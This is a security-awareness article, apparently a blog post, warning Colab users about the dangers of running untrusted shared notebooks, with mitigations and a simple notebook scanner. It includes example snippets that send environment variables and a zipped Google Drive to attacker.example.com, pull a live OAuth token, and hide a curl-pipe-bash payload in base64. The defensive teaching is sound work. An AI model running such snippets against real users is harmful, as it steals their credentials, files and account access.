You find a tutorial on Reddit. Someone solved the exact problem you’ve been stuck on. There’s a Google Colab link. You click it, hit Run All, and wait for the output.

That’s it. That’s the attack.

TL;DR

  • Google Colab notebooks run with access to your Google account, Drive, and any credentials stored in the session
  • A single Run All click on an unreviewed notebook can exfiltrate your API keys, files, and OAuth tokens
  • NVIDIA’s AI Red Team found 140+ active credentials hardcoded in Kaggle notebooks shared publicly
  • Malicious notebooks can abuse Google’s trusted IP range to bypass firewalls and run as command-and-control servers
  • Mitigation is simple: never run a notebook you haven’t read, and use a dedicated throwaway Google account for testing

Why This Matters to You

Google Colab has tens of millions of users. It’s the go-to environment for data science, machine learning research, AI tutorials, and academic coursework. Notebooks are shared constantly — on GitHub, Kaggle, Reddit, Discord, and alongside research papers.

The vast majority of those users run shared notebooks without reading the code. That’s not a character flaw — it’s the culture. The implicit assumption is that because it’s running on Google’s infrastructure, it must be safe.

That assumption is wrong, and this article explains exactly why.


What Google Colab Actually Is

Think of Colab as a rented computer that Google gives you for free. You get a Linux machine with a GPU, Python pre-installed, and direct access to your Google account. When you open a notebook and click Run All, you’re executing code on that machine — as root.

The key word is access. When you use Colab, the session has:

  • Access to your Google Drive (if you mount it)
  • A valid Google OAuth token linked to your account
  • Access to any environment variables you set, including API keys
  • Root privileges on the temporary compute instance
  • The ability to install any software via pip or apt
  • Network access to send data anywhere on the internet

This is a powerful environment. That’s exactly what makes it dangerous when the code inside isn’t yours.
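
You can verify this from a fresh notebook yourself. Here’s a quick sanity check using only standard library calls (the outputs noted in the comments are what you’d typically see on a Colab VM):

import os, getpass

# Confirm the session runs as root and can see every environment variable
print(getpass.getuser())         # typically 'root' on a Colab VM
print(os.geteuid())              # 0 means root
print(sorted(os.environ)[:10])   # first few environment variable names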


The Attack Vectors

1. Stealing API Keys and Environment Variables

The most common attack is the simplest. Researchers and developers often store API keys as environment variables in their Colab session — for OpenAI, HuggingFace, AWS, GitHub, and dozens of other services.

A malicious notebook can silently collect all of them in seconds:

import os, requests
# Grab every environment variable and send it to attacker's server
env_data = dict(os.environ)
requests.post("https://attacker.example.com/collect", json=env_data, timeout=5)

This runs invisibly. No error, no warning, no indication anything happened. The output cell stays empty while your credentials are already in someone else’s database.

NVIDIA’s AI Red Team made this concrete in 2024. They analyzed 3.5 million Python files and Jupyter notebooks from the Meta Kaggle for Code dataset and found over 140 unique active credentials hardcoded in publicly shared notebooks — API keys for OpenAI, AWS, and GitHub, sitting in plaintext for anyone to find and use.

2. Google Drive Exfiltration

Many Colab workflows start with mounting Google Drive:

from google.colab import drive
drive.mount('/content/drive')

Once mounted, the notebook has read access to your entire Drive. Documents, spreadsheets, credentials files, private research data — all of it becomes accessible. A malicious notebook can compress and upload your Drive contents to an external server without triggering any alerts:

import shutil, requests
# Archive entire Drive
shutil.make_archive('/tmp/drive_backup', 'zip', '/content/drive/MyDrive')
# Upload to attacker server
with open('/tmp/drive_backup.zip', 'rb') as f:
    requests.post("https://attacker.example.com/upload", files={'file': f})

Depending on how much is stored in the Drive, the entire operation can finish in under a minute.

3. Google OAuth Token Theft

This is the most serious vector. When you open Colab, Google issues an OAuth token to your session — a temporary credential that proves you are you, linked to your full Google account. This token can be extracted from the session and used to access your Gmail, Calendar, Drive, and other Google services.

Google considers this acceptable behavior from within the Colab environment. It’s “working as intended.” But it means that code running in your Colab session can act on your behalf across your entire Google account, at least until the token expires.
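
To make that concrete, here is a minimal sketch of the ambient-credential problem, assuming you authenticated earlier in the session (for example via google.colab.auth.authenticate_user()). Any cell that runs afterwards can pick up a live token:

import google.auth
from google.auth.transport.requests import Request

# Pick up whatever credential the session already holds
creds, project = google.auth.default()
creds.refresh(Request())          # mint a fresh access token
print(creds.token[:12] + "...")   # a live bearer token for your account

A malicious cell would post that token to an external server instead of printing it.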

4. Obfuscated Code

Malicious code doesn’t always look malicious. Python makes it trivial to hide what code actually does:

# This runs arbitrary code — the actual payload is base64-encoded
import base64
exec(base64.b64decode(
    "aW1wb3J0IHN1YnByb2Nlc3MKc3VicHJvY2Vzcy5ydW4oJ2N1cmwgaHR0cHM6Ly9hdHRhY2tlci5leGFtcGxlLmNvbS9zdGFnZTIuc2ggfCBiYXNoJywgc2hlbGw9VHJ1ZSk="
))

To a casual reader, this looks like a harmless import and a long string. Decode that base64 and you get a command that fetches and executes a shell script from an external server.

Variants include multi-level encoding, splitting the payload across multiple cells, using innocuous variable names, and hiding execution inside helper functions called at the end of the notebook. None of these are detectable without carefully reading every line of code.
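
If you run into an encoded blob like the one above, don’t execute it to find out what it does. Decode it and read it instead: the same b64decode call, minus the exec:

import base64

# Paste the suspicious string here instead of handing it to exec()
payload = "aW1wb3J0IHN1YnByb2Nlc3MKc3VicHJvY2Vzcy5ydW4oJ2N1cmwgaHR0cHM6Ly9hdHRhY2tlci5leGFtcGxlLmNvbS9zdGFnZTIuc2ggfCBiYXNoJywgc2hlbGw9VHJ1ZSk="
print(base64.b64decode(payload).decode())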

5. Malicious pip Packages

Colab notebooks frequently install packages:

!pip install totally-legitimate-ml-library

Typosquatting — registering packages with names nearly identical to popular ones — is a known and growing problem: malicious package counts in open source ecosystems rose 37% between 2024 and 2025, according to Kaspersky. A notebook that installs scikit-leam (an “rn”-to-“m” lookalike) instead of scikit-learn, or numpy-ml instead of a package you actually recognize, can execute attacker code at install time, via setup scripts that run before the rest of the notebook does.

Supply chain attacks through PyPI have affected packages with millions of downloads. Colab’s “install and run” workflow makes users uniquely vulnerable because there’s no review step — the install happens as part of running the notebook.

6. Using Google as a Command-and-Control Server

Google triaged this one as “Won’t Fix” when it was reported. Because Colab runs on Google’s infrastructure, all traffic from the session originates from Google’s IP addresses — addresses that most firewalls, content filters, and security tools trust by default.

Security researcher 4n7m4n demonstrated that Colab can be weaponized as a command-and-control (C2) server: a persistent connection between the attacker and a compromised machine, routed through Google’s trusted infrastructure. His reverse shells stayed alive even after the standard session ended, using a zombie-process technique that survives Colab’s cleanup mechanisms.

From a blue team perspective, traffic from Google’s IP ranges to internal systems rarely raises alarms. That’s what makes this dangerous.


Who Is Actually at Risk

The population of Colab users is enormous and spans a wide trust spectrum:

Students and hobbyists follow YouTube tutorials and blog posts. The culture is “click and run.” Security review isn’t part of the workflow.

Kaggle competitors share and copy notebooks rapidly, optimizing for leaderboard performance rather than code hygiene. Many have HuggingFace, Kaggle, and OpenAI tokens loaded in their sessions.

Academic researchers replicate results from papers by running the accompanying GitHub code. The assumption is that peer-reviewed research code is safe — but paper code often goes through no security review at all.

Data scientists in organizations sometimes use personal Colab accounts for quick analysis, inadvertently loading work credentials or accessing Drive files that contain sensitive organizational data.

The unifying factor: the more you trust the source (a famous researcher, a top Kaggle competitor, an official-looking tutorial), the less likely you are to read the code before running it.


What You Can Do Today

1. Always Read the Notebook First

This sounds obvious, but it’s not common practice. Before clicking Run All, scroll through every cell. Look specifically for:

  • exec(), eval(), __import__()
  • base64.b64decode()
  • subprocess, os.system(), os.popen()
  • requests.post() or any HTTP calls to unfamiliar URLs
  • Pip installs of packages you don’t recognize

You don’t need to understand every line — you need to identify suspicious patterns.
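
If you’d rather not eyeball every cell by hand, a rough first pass is easy to automate. This is an illustrative sketch, not a complete detector; the filename and pattern list are examples. Since .ipynb files are plain JSON, you can scan the code cells before the notebook ever touches Colab:

import json, re

# Red-flag patterns from the checklist above; extend as needed
SUSPICIOUS = [
    r"\bexec\s*\(", r"\beval\s*\(", r"__import__",
    r"b64decode", r"\bsubprocess\b", r"os\.system", r"os\.popen",
    r"requests\.(post|get)", r"pip\s+install",
]

def scan_notebook(path):
    with open(path) as f:
        nb = json.load(f)
    for i, cell in enumerate(nb.get("cells", [])):
        if cell.get("cell_type") != "code":
            continue
        source = "".join(cell.get("source", []))
        for pattern in SUSPICIOUS:
            if re.search(pattern, source):
                print(f"cell {i}: matches {pattern!r}")

scan_notebook("shared_notebook.ipynb")  # example filename

A match isn’t proof of malice; plenty of legitimate notebooks shell out or make HTTP calls. But it tells you exactly which cells deserve a close read.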

2. Use a Throwaway Google Account

Create a dedicated Google account for testing untrusted notebooks. It should have:

  • No connected Drive with real data
  • No active Google Workspace access
  • No API keys or credentials loaded

If something goes wrong, the blast radius is zero. This is the single highest-impact mitigation.

3. Don’t Mount Your Drive in Untrusted Notebooks

If a notebook you didn’t write asks you to mount your Drive, ask yourself why. Most computational tasks don’t require Drive access. Decline the mount or don’t run the notebook at all.

4. Don’t Load Credentials Before Reviewing Code

A common workflow is to set up API keys at the top of a session, then run a community notebook. Reverse that order: review the notebook first, then — only if you trust it — add credentials.

5. Verify pip Package Names

Before running a pip install, check the package name against PyPI. Look for the official page, check the download count, and verify the author. A package with 3 downloads from an account created last week should not be running on your machine.
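
PyPI exposes package metadata through a JSON API, so the basics of this check take a few lines. A minimal sketch (the package name is an example; note that download statistics live on pypistats.org, not in this endpoint):

import requests

name = "scikit-learn"  # substitute whatever the notebook installs
resp = requests.get(f"https://pypi.org/pypi/{name}/json", timeout=10)
if resp.status_code != 200:
    print(f"{name}: not found on PyPI, do not install")
else:
    info = resp.json()["info"]
    print("name:    ", info["name"])
    print("version: ", info["version"])
    print("author:  ", info.get("author") or info.get("author_email"))
    print("homepage:", info.get("home_page") or info.get("project_urls"))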

6. Use Colab’s Built-in Secrets Manager

Google added a Secrets panel to Colab (the key icon in the sidebar). It allows you to store API keys that notebooks can access only if you explicitly grant permission per-notebook, per-session. This is significantly safer than pasting keys into cells or loading them from Drive.
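
Reading a stored secret then looks like this (the key name is an example):

from google.colab import userdata

# Returns the secret only if you granted this notebook access in the panel
api_key = userdata.get('OPENAI_API_KEY')  # example key name

If you haven’t granted the notebook access to that secret, the call fails rather than silently handing the key over.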


The Bigger Picture

Google Colab is a remarkable tool. Free GPU access, zero setup, shareable notebooks — it lowered the barrier to machine learning research dramatically. That accessibility is genuinely valuable.

But accessibility and security are in tension. The same frictionlessness that makes Colab great for learning makes it dangerous when code review is skipped. The NVIDIA research finding 140+ live credentials in public Kaggle notebooks wasn’t a hypothetical — those were real keys that real attackers could use right now.

The fix isn’t to stop using Colab. It’s to treat a Colab notebook like you’d treat any code you didn’t write: with a quick review before you give it the keys to your house.

MITRE ATT&CK maps this threat under Unsecured Credentials (T1552) for credential exposure and Command and Scripting Interpreter: Python (T1059.006) for execution via notebooks.



Sources